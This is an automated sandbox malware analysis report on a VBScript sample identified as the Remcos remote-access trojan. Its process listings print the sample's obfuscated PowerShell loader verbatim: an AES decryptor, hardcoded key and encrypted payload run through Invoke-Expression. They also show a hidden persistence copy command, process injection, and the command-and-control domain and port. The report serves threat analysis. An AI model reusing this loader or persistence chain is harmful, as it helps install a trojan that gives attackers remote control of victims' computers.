Malware Analysis Report

2025-06-16 01:18

Sample ID 231205-xagexsea8s
Target envifa.vbs
SHA256 043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401
Tags
remcos remotehost rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401

Threat Level: Known bad

The file envifa.vbs was found to be: Known bad.

Malicious Activity Summary

remcos remotehost rat

Remcos

Blocklisted process makes network request

Drops startup file

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-05 18:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win7-20231023-en

Max time kernel

117s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

Network

N/A

Files

memory/2992-4-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp

memory/2992-7-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2992-6-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-5-0x000000001B1A0000-0x000000001B482000-memory.dmp

memory/2992-8-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp

memory/2992-10-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-9-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-11-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-12-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2992-13-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win10-20231025-en

Max time kernel

290s

Max time network

295s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2916 set thread context of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 2916 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 2916 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = 'k8qwzV8P21gGtVOd7SAXmfQRh03MJ8Ged4nJeFFrdUwM2fadaBY/VhUNeySTG+oRhJ9e56m8gBh4H+lvV3bGt5/4/STem83phMPT5OiQ1pJCN7POF3qxkETdQB1FBgemfV/Sb5PgEuhjs+4iar71WgBaMwmf0egTMyDORL3mT8ucIk/Tro4TtYXBtNVzQnKSKybtqfPKA4qjsO4Rxg3JhxINiAwILViH1c/eV5ymyCnUye5q3UBG5U/M/HtIEHiJEzRqK7TvGFqMXJLPSFhYoQSsEJ6QRBfrnKoYlWSi3+iwj5b1hYRSTnCIuEr7l0jt17vlkvrfq/GatFniAvDUg8SwY98T2yvAl6j1L+2KOg6rnY9odExu2H4pBKVXyD5i6vI7mFEP7RWmE36WXZKeulXG7ZiX5L82vA1uPpnHGC9qpq7YadP/1pxZUt+/Duv0rti0jdyjKVBZiwK+DeIhSGnrQaF7tTREeBIITWLarMrwnlvyXwORDEMWFo61NzGUQoh9DNOfFFrjALQoJdh4V6fqhUUBECbhpY8syBN12l2pDXF/+COo5yyN7yYND0d3rP6M7ZTzdUFJ0wcoZGFiB0K1DQPh+e6k2EvRlSfPhkLfO9LpdCv3JMgTEahtfb0jgmDzX1sq3ZHyXHy/zTaoRRuAtjktJPQVhTZOopGXv6Xak5FmtZF4KN6HWt41P2kAeuMGCfXRA71xIiv/ZZa5w6TUs0e4mVj+mtKoph2m0shsuvBEGPsBYfbT+l4AqEsPi6bV47Yml1bm22e/iBcrEY5CvgLbuNVwDN881rO2/EzWh3b3buHpTW8OKWdXY//WbmNiKiErwSITIYqAs/yvZHgtx62BtfqzrtS3CHGzmP2ziY0sAGmlQl7f7xoC+6Pz0fqO/s3fgOv0Ti9TiZIlzOv/5aOHwZXtFeWHOEMthan8J/261I9yW9JWGdc42XVOnr04TuITT6m7d8t+02s1ftDwrPTUXdLfZvXxvwNR8Qpm8LquSwMajLiDrn1gpBLficCnjZlh7bZVW6vsjpLDhGQU8xjPTJwz3hRlq1lR7Ddi/op236ZEEiAPW+u
lcm/W128KYkg/8CsfbDGsZoopcwKClQRDk2jVUuy3kAnz4o3fSTpt8UTWmua6l2q6S37Hyk6Dh14U06Ih4qxL6QAi9jV9XT3AyHOdzT7cYTopKGn9Jpa847OqUI/ixnyXdRr07jxmCR9JC0ZcxGLe0/6dWZqmj/hSOOaoLB6G3iLHuo9pXMQ6QE3Iwk6+uigKC+q6AWNRkz2yI1Ms7mgylxYJLmjCR3urwbGQRdz5SQNwYIY435VyYp7PNEEYDH1Su164ceW2UyoIAVdlI9h6lMfCRWS32zFWnTfw7X5u1ASMdpZPjITVPrKgN3st4K4Okg38K6fAkOZMFzIK/rPiHN1jMEvLn2lNcSj53sWoxCdJcDZEJxbIxCbg258lVibR8l4mea9/Gm1Du4honGCCOQ04OrLgDjcjUFHm6IPapDXlXXlO3qLShW2WkTBVLNmo2mCyb3Khg8tg1HNmypVIRH9bYbWNq5PwLiE4i0gRO8zpFbtoyvZ4A1LUdLmR6gEriE4mjChgL4kT0stuG8d4RpNeIhdxAQjEu1G3UUA5+JusNv5I03apj3rG0awF+5Fx2p61XY83VNbUu6pPOFL08zV64IDK6PaPi7zJ92FbkSYiPjloT8S23k3G/lw6Iw8l1dfmpEC6tRhGoOuqFN1QWwUf8ietmQoZ7aG+vk0Dp5MaHcgSqpAFIudPkgx2UPM8/PCAHw9dlm4H1gLBMSPQxiWhjfFpCF1+DPZDVNt5csuwhqr5gz6O3oLoXvqR+Y5Qpen0ZijFlIsD/sCyFa6ia7R8yT7eAzqAYqaTCuTNVBIuu4/i7tMEJBDytK1XZvwnuwn8urP3S0I3goQmUlECx6iUkg+3bOTTYzXHFbDHP5Mq2zQLnyiHUV38V5PRcY9BL/ByuJlLdILx1lWIglQPsmHUXr2P9jd3Sl9bnql2F8rP4a7XY65ORGh2uRpjBO5TO7lVKdLbzyfU20BSjwv5PyYH57NcYkpzXfNnWxNUsWryAvk=';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 188.114.97.0:443 paste.ee tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 155.162.142.181.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 128.99.217.23.in-addr.arpa udp

Files

memory/2916-4-0x00000237E6750000-0x00000237E6772000-memory.dmp

memory/2916-5-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

memory/2916-7-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp

memory/2916-9-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp

memory/2916-10-0x00000237FEB40000-0x00000237FEBB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zv00cg1g.res.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2916-25-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp

memory/2916-26-0x0000023780000000-0x00000237807A6000-memory.dmp

memory/2916-29-0x00000237FEBC0000-0x00000237FEBCC000-memory.dmp

memory/2916-34-0x0000023FFF520000-0x0000023FFF53E000-memory.dmp

memory/3172-37-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

memory/3172-40-0x000001B32D730000-0x000001B32D740000-memory.dmp

memory/3172-41-0x000001B32D730000-0x000001B32D740000-memory.dmp

memory/4172-60-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3172-61-0x000001B32D730000-0x000001B32D740000-memory.dmp

memory/4172-68-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3172-70-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f6c90ab0db80c6c3ea92556fda7273c7
SHA1 01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256 a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512 aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

memory/4172-72-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-74-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2916-71-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 679c08c2fcef41f7ff70c991404bbc84
SHA1 efb3707a241424adc528888f9f161d04be21ef69
SHA256 049e9c3cc1fd8c01c6f980e8e87070d02fafa41eae7d60376b939552e7942dc1
SHA512 1f2d713f8f3e77efaa7484bdc463ab47541b4673b1e35e77437c87cb7682185b4b76a3823768f5ceb100d7d1c0c73f123282fd4715355f3bdde4228eb455c763

memory/4172-75-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-77-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-78-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-79-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-80-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-81-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-82-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-83-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-84-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-85-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-86-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-88-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-89-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-90-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-91-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-92-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-93-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-95-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-96-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-97-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-98-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-99-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-100-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-102-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-103-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-104-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-105-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-106-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-107-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-108-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-109-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-111-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-112-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-113-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-114-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-115-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-116-0x0000000000400000-0x0000000000482000-memory.dmp

C:\ProgramData\remcos\registros.dat

MD5 bf306e98b8575f3eb0fa3b040090ef41
SHA1 a50e3c21a00c91aa9af6074816ae9b76dd86c1c0
SHA256 b0e14b0220c5c706e1f98ff3754f20a7fa1f9b0d3a31555a645a690423770644
SHA512 8ddf6857be95e63bdd759c60a888b44f12573b49a57abb5925763b3d7ae6b27363136f43472264bc88e1d38e63357aee52a641fd05481c126af24051e982f5b1

memory/4172-118-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-119-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-120-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-121-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-122-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-123-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-124-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-125-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-127-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-128-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-129-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-130-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-131-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-132-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-133-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-135-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-136-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-137-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-138-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-139-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-140-0x0000000000400000-0x0000000000482000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win10v2004-20231127-en

Max time kernel

300s

Max time network

305s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1348 set thread context of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3680 wrote to memory of 1348 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1348 wrote to memory of 688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 1348 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '[base64-encoded AES payload elided]';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 138.255.221.88.in-addr.arpa udp
US 8.8.8.8:53 paste.ee udp
US 188.114.96.0:443 paste.ee tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 226.173.246.72.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 155.162.142.181.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 61.122.16.96.in-addr.arpa udp
US 8.8.8.8:53 81.254.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
CO 181.142.162.155:4576 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4r2gs4k2.qj2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
